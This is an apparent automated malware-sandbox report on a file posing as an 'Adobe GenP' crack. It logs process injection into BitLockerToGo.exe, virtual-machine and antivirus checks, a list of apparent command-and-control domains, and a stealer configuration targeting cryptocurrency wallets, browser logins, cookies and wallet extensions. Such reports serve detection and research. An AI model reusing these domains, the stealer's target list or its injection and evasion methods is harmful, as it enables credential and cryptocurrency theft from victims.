            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: Adobe GenP 5.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Adobe GenP 5.exeStatic file information: File size 14820352 > 1048576
            Source: Adobe GenP 5.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29f600
            Source: Adobe GenP 5.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2bd200
            Source: Adobe GenP 5.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x862200
            Source: Adobe GenP 5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
            Source: Adobe GenP 5.exeStatic PE information: section name: .symtab
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043B250 push eax; mov dword ptr [esp], 86858453h3_2_0043B253
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5388Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5392Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382147088.00000000058B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609310539.000000000353D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610206600.000000000353D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG[$)
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Adobe GenP 5.exe, 00000000.00000002.2309110578.0000000001F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382147088.00000000058B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00439AF0 LdrInitializeThunk,3_2_00439AF0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: icyidentifysu.click
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 30A3008Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43E000Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 441000Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: BitLockerToGo.exe, 00000003.00000003.2517544974.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493579531.00000000035E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s%\Windows Defender\MsMpeng.exe
            Source: BitLockerToGo.exe, 00000003.00000003.2476870231.00000000035E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: BitLockerToGo.exe, 00000003.00000003.2452701228.000000000588F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn%&<x
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: BitLockerToGo.exe, 00000003.00000003.2517337985.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
            Source: BitLockerToGo.exe, 00000003.00000003.2517337985.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: BitLockerToGo.exe, 00000003.00000003.2517337985.00000000035C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
